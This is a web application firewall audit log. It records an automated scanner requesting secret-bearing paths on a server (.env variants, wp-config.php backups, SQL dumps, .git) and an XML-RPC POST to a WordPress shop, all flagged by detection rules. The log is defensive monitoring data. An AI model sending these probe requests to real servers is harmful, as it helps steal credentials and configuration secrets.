WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/debug.log"] [unique_id "aFCsKdyZ4SMykfn97vy3xgAAAAs"] Stopwatch: 1750117417370434 2808 (- - -) Stopwatch2: 1750117417370434 2808; combined=1662, p1=313, p2=1258, p3=18, p4=23, p5=50, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82ddcd72-Z-- --779e383d-A-- [17/Jun/2025:05:13:37.593650 +0530] aFCsKQrsPejRtmHkrKLg0gAAAAE 185.177.72.204 47716 127.0.0.1 7080 --779e383d-B-- GET /site/dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --779e383d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --779e383d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/dump.sql"] [unique_id "aFCsKQrsPejRtmHkrKLg0gAAAAE"] Stopwatch: 1750117417590846 2845 (- - -) Stopwatch2: 1750117417590846 2845; combined=1701, p1=353, p2=1259, p3=18, p4=23, p5=48, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --779e383d-Z-- --19c53219-A-- [17/Jun/2025:05:13:37.815278 +0530] aFCsKQGFf516NUzzD0B3nQAAAAg 185.177.72.204 47730 127.0.0.1 7080 --19c53219-B-- GET /site/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --19c53219-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --19c53219-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/error.log"] [unique_id "aFCsKQGFf516NUzzD0B3nQAAAAg"] Stopwatch: 1750117417812403 2927 (- - -) Stopwatch2: 1750117417812403 2927; combined=1732, p1=353, p2=1285, p3=17, p4=24, p5=53, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --19c53219-Z-- --cf339f39-A-- [17/Jun/2025:05:13:38.146386 +0530] aFCsKooVQnPDyHnl9oPT9gAAAAY 185.177.72.204 47752 127.0.0.1 7080 --cf339f39-B-- GET /site/logs/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cf339f39-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf339f39-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/logs/error.log"] [unique_id "aFCsKooVQnPDyHnl9oPT9gAAAAY"] Stopwatch: 1750117418142751 3691 (- - -) Stopwatch2: 1750117418142751 3691; combined=2240, p1=429, p2=1689, p3=23, p4=30, p5=68, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf339f39-Z-- --f8cad753-A-- [17/Jun/2025:05:13:38.524195 +0530] aFCsKZVkCcfT-Z8NQYzFPAAAAAc 146.190.105.35 57672 127.0.0.1 7081 --f8cad753-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=ai4kaniimb5lo90liicshf1kbn; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_42bb8b3f9ce44d4797ab5041c7fd5d%7C%7C1750290217%7C%7C1750286617%7C%7Ca807e9b89cb867a090492959bba11073; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=7c7e5b82a5e7d320f1328feb5823d1c0%7C%7C1750290217%7C%7C1750286617%7C%7C002f837544d365b9e018e8757b77a4b7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --f8cad753-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=utv92hpvacdm0vngfsdu06eja0; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_646733ada1433e6c1baee8f402d2c1%7C%7C1750290218%7C%7C1750286618%7C%7Ca497be72e45a2e274c441b235a795829; expires=Wed, 18 Jun 2025 23:43:38 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=07e6dda303a714cead4b2f62a80aee0b%7C%7C1750290218%7C%7C1750286618%7C%7Ce9435ac5727e3fde049dd102b3968f0e; expires=Wed, 18 Jun 2025 23:43:38 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f8cad753-E-- --f8cad753-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCsKZVkCcfT-Z8NQYzFPAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117417484957 1039323 (- - -) Stopwatch2: 1750117417484957 1039323; combined=2700, p1=338, p2=1968, p3=101, p4=44, p5=155, sr=82, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f8cad753-Z-- --bafa2b71-A-- [17/Jun/2025:05:13:38.697960 +0530] aFCsKtyZ4SMykfn97vy3yAAAAAs 185.177.72.204 47794 127.0.0.1 7080 --bafa2b71-B-- GET /site/site.conf HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bafa2b71-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --bafa2b71-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/site.conf"] [unique_id "aFCsKtyZ4SMykfn97vy3yAAAAAs"] Stopwatch: 1750117418694719 3285 (- - -) Stopwatch2: 1750117418694719 3285; combined=2027, p1=366, p2=1556, p3=21, p4=27, p5=57, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bafa2b71-Z-- --08fdfa0b-A-- [17/Jun/2025:05:13:38.809688 +0530] aFCsKgJ4p5Cdblnjra54MwAAAAI 185.177.72.204 47802 127.0.0.1 7080 --08fdfa0b-B-- GET /site/site.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --08fdfa0b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --08fdfa0b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/site.sql"] [unique_id "aFCsKgJ4p5Cdblnjra54MwAAAAI"] Stopwatch: 1750117418805367 4397 (- - -) Stopwatch2: 1750117418805367 4397; combined=2780, p1=508, p2=2134, p3=30, p4=34, p5=74, sr=148, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --08fdfa0b-Z-- --85e65171-A-- [17/Jun/2025:05:13:38.920252 +0530] aFCsKuTJOk1gXj_qIh4YOAAAAAQ 185.177.72.204 47814 127.0.0.1 7080 --85e65171-B-- GET /site/wp-config.php HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --85e65171-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --85e65171-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/wp-config.php"] [unique_id "aFCsKuTJOk1gXj_qIh4YOAAAAAQ"] Stopwatch: 1750117418916953 3344 (- - -) Stopwatch2: 1750117418916953 3344; combined=2026, p1=411, p2=1507, p3=22, p4=28, p5=58, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --85e65171-Z-- --c4a02756-A-- [17/Jun/2025:05:13:39.030235 +0530] aFCsKwGFf516NUzzD0B3nwAAAAg 185.177.72.204 47826 127.0.0.1 7080 --c4a02756-B-- GET /site/wp-config.php.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c4a02756-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4a02756-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/site/wp-config.php.old"] [unique_id "aFCsKwGFf516NUzzD0B3nwAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site/wp-config.php.old"] [unique_id "aFCsKwGFf516NUzzD0B3nwAAAAg"] Stopwatch: 1750117419027321 2956 (- - -) Stopwatch2: 1750117419027321 2956; combined=1759, p1=378, p2=1264, p3=16, p4=22, p5=79, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c4a02756-Z-- --bd0a4074-A-- [17/Jun/2025:05:13:40.248324 +0530] aFCsLArsPejRtmHkrKLg1QAAAAE 185.177.72.204 35676 127.0.0.1 7080 --bd0a4074-B-- GET /src/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bd0a4074-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd0a4074-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.env"] [unique_id "aFCsLArsPejRtmHkrKLg1QAAAAE"] Stopwatch: 1750117420245032 3341 (- - -) Stopwatch2: 1750117420245032 3341; combined=1920, p1=442, p2=1370, p3=20, p4=24, p5=64, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bd0a4074-Z-- --4692e61e-A-- [17/Jun/2025:05:13:40.358857 +0530] aFCsLGMOUduHrxpwbslYmAAAAAM 185.177.72.204 35684 127.0.0.1 7080 --4692e61e-B-- GET /src/.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4692e61e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4692e61e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.env.bak"] [unique_id "aFCsLGMOUduHrxpwbslYmAAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/.env.bak"] [unique_id "aFCsLGMOUduHrxpwbslYmAAAAAM"] Stopwatch: 1750117420355841 3058 (- - -) Stopwatch2: 1750117420355841 3058; combined=1825, p1=405, p2=1310, p3=18, p4=23, p5=69, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4692e61e-Z-- --40388037-A-- [17/Jun/2025:05:13:40.469127 +0530] aFCsLNyZ4SMykfn97vy3ywAAAAs 185.177.72.204 35694 127.0.0.1 7080 --40388037-B-- GET /src/.env.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --40388037-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --40388037-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.env.local"] [unique_id "aFCsLNyZ4SMykfn97vy3ywAAAAs"] Stopwatch: 1750117420466221 2948 (- - -) Stopwatch2: 1750117420466221 2948; combined=1732, p1=398, p2=1243, p3=18, p4=23, p5=49, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --40388037-Z-- --75c12e76-A-- [17/Jun/2025:05:13:40.579430 +0530] aFCsLAJ4p5Cdblnjra54NgAAAAI 185.177.72.204 35704 127.0.0.1 7080 --75c12e76-B-- GET /src/.env.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --75c12e76-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --75c12e76-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.env.old"] [unique_id "aFCsLAJ4p5Cdblnjra54NgAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/.env.old"] [unique_id "aFCsLAJ4p5Cdblnjra54NgAAAAI"] Stopwatch: 1750117420576465 3006 (- - -) Stopwatch2: 1750117420576465 3006; combined=1817, p1=414, p2=1296, p3=17, p4=22, p5=68, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --75c12e76-Z-- --c7a57231-A-- [17/Jun/2025:05:13:40.689897 +0530] aFCsLFCTF37l_jAzt4oTPAAAAAU 185.177.72.204 35708 127.0.0.1 7080 --c7a57231-B-- GET /src/.env.save HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c7a57231-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7a57231-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.env.save"] [unique_id "aFCsLFCTF37l_jAzt4oTPAAAAAU"] Stopwatch: 1750117420686779 3162 (- - -) Stopwatch2: 1750117420686779 3162; combined=1907, p1=397, p2=1412, p3=21, p4=25, p5=52, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c7a57231-Z-- --f7e03e56-A-- [17/Jun/2025:05:13:40.800521 +0530] aFCsLJWbMc1Q3J_M-mhI9AAAAAo 185.177.72.204 35724 127.0.0.1 7080 --f7e03e56-B-- GET /src/.env~ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f7e03e56-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7e03e56-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.env~"] [unique_id "aFCsLJWbMc1Q3J_M-mhI9AAAAAo"] Stopwatch: 1750117420797181 3385 (- - -) Stopwatch2: 1750117420797181 3385; combined=1965, p1=400, p2=1463, p3=20, p4=25, p5=56, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f7e03e56-Z-- --77c2e016-A-- [17/Jun/2025:05:13:40.910724 +0530] aFCsLArsPejRtmHkrKLg1gAAAAE 185.177.72.204 35736 127.0.0.1 7080 --77c2e016-B-- GET /src/.git/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --77c2e016-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --77c2e016-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file 